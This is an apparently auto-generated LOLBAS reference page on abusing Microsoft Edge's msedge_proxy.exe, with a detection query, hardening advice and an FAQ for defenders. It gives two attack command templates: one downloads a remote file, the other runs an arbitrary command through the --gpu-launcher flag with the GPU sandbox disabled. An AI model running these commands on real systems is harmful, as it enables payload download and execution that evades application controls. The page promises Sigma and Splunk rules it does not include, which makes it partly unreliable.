>msedge_proxy.exe

Microsoft Edge Browser

Default Executable Paths

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Integrity & Metadata

Category Count: 2 weaponized patterns
Forensics & Triage Insight

Documented in LOLBAS project by Mert Daş.

Detection Engineering Notes

Monitor process creation events where FileName is "msedge_proxy.exe" or command line references known attack arguments.

Executive Summary & AI Quick Reference

High-Fidelity Telemetry Profile

msedge_proxy.exe is a native utility pre-installed on Windows systems. Threat actors and red teams abuse msedge_proxy.exe as a Living-off-the-Land Binary (LOLBin) to achieve Download, Execute without triggering traditional antivirus file-hash alerts. Legitimate system administrators use it for routine administration, making behavioral command-line telemetry essential for differentiation.

Primary Abused Tactics
Download, Execute
Minimum Privilege
User
Key Telemetry Source
Sysmon 1 / 4688
ATT&CK Mapping
T1105, T1218.015

Weaponized Parameters & Proof-of-Concepts

Documented attack commands, parameter flags, and privilege prerequisites.

2 documented methods
Filter Purpose:
DownloadPrivileges: User
T1105: Ingress Tool Transfer

msedge_proxy will download malicious file.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}
ExecutePrivileges: User
T1218.015: Technique T1218.015

msedge_proxy.exe will execute file in the background

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"

SIEM & EDR Detection Rules

Production telemetry rules configured for Microsoft Defender, Sigma, and Splunk.

Telemetry & SIEM Detection Suite (msedge_proxy.exe)

Validated against MITRE T1105, T1218.015
msedge_proxy.exe Microsoft Defender Querykql
1// Microsoft Defender XDR / Microsoft Sentinel
2// Tactic: Download
3DeviceProcessEvents
4| where FileName =~ "msedge_proxy.exe"
5| where ProcessCommandLine has_any ("msedge_proxy")
6| project
7 Timestamp,
8 DeviceName,
9 AccountName,
10 InitiatingProcessParentFileName,
11 InitiatingProcessFileName,
12 InitiatingProcessCommandLine,
13 FileName,
14 FolderPath,
15 ProcessCommandLine,
16 MD5,
17 SHA256
18| sort by Timestamp desc

Mitigation, Hardening & Prevention

Recommended defensive controls to block or constrain msedge_proxy.exe abuse.

Application Whitelisting

Enforce Windows Defender Application Control (WDAC) or AppLocker publisher rules to prevent execution outside approved enterprise administration scripts.

Attack Surface Reduction

Enable ASR rules: Block executable content from email client and webmail and Block Office applications from creating child processes spawning msedge_proxy.exe.

Behavioral Alerting

Deploy the KQL, Sigma, and Splunk detection queries below. Alert on anomalous child processes, web requests to unrated external IPs, or encoded payload strings.

Frequently Asked Questions (FAQ) • msedge_proxy.exe

Key operational questions and defensive answers about msedge_proxy.exe LOLBin tradecraft.

What is msedge_proxy.exe and why is it classified as a LOLBin?

msedge_proxy.exe is a legitimate, pre-installed or trusted utility on Windows. It is classified as a Living-off-the-Land Binary (LOLBin) because adversaries abuse its built-in functionality to perform malicious operations—such as Download, Execute—without dropping custom malware binaries on disk.

How do threat actors abuse msedge_proxy.exe in cyber intrusions?

Adversaries leverage msedge_proxy.exe to execute stealthy actions while evading signature-based security controls. For example, attackers execute commands like "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}" to achieve Download, Execute, masquerading behind legitimate system process lineage.

How can SOC analysts detect suspicious msedge_proxy.exe activity?

Detection engineers monitor process creation events (Windows Event ID 4688 or Sysmon Event ID 1; Linux auditd EXECVE; macOS Endpoint Security) inspecting anomalous command line arguments, unusual parent-child process relationships (e.g. Office apps or web servers spawning msedge_proxy.exe), and unexpected network connections.

What MITRE ATT&CK techniques does msedge_proxy.exe map to?

msedge_proxy.exe maps to MITRE ATT&CK technique(s): T1105, T1218.015. These techniques cover adversary actions across tactics such as Defense Evasion, Execution, Persistence, and Command and Control.

How can organizations mitigate and restrict msedge_proxy.exe?

Mitigation strategies include implementing Application Control policies (AppLocker or Windows Defender Application Control - WDAC), enforcing Attack Surface Reduction (ASR) rules, configuring strict privilege separation (disallowing standard users from running sensitive switches), and alerting on execution from non-standard directories.

Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point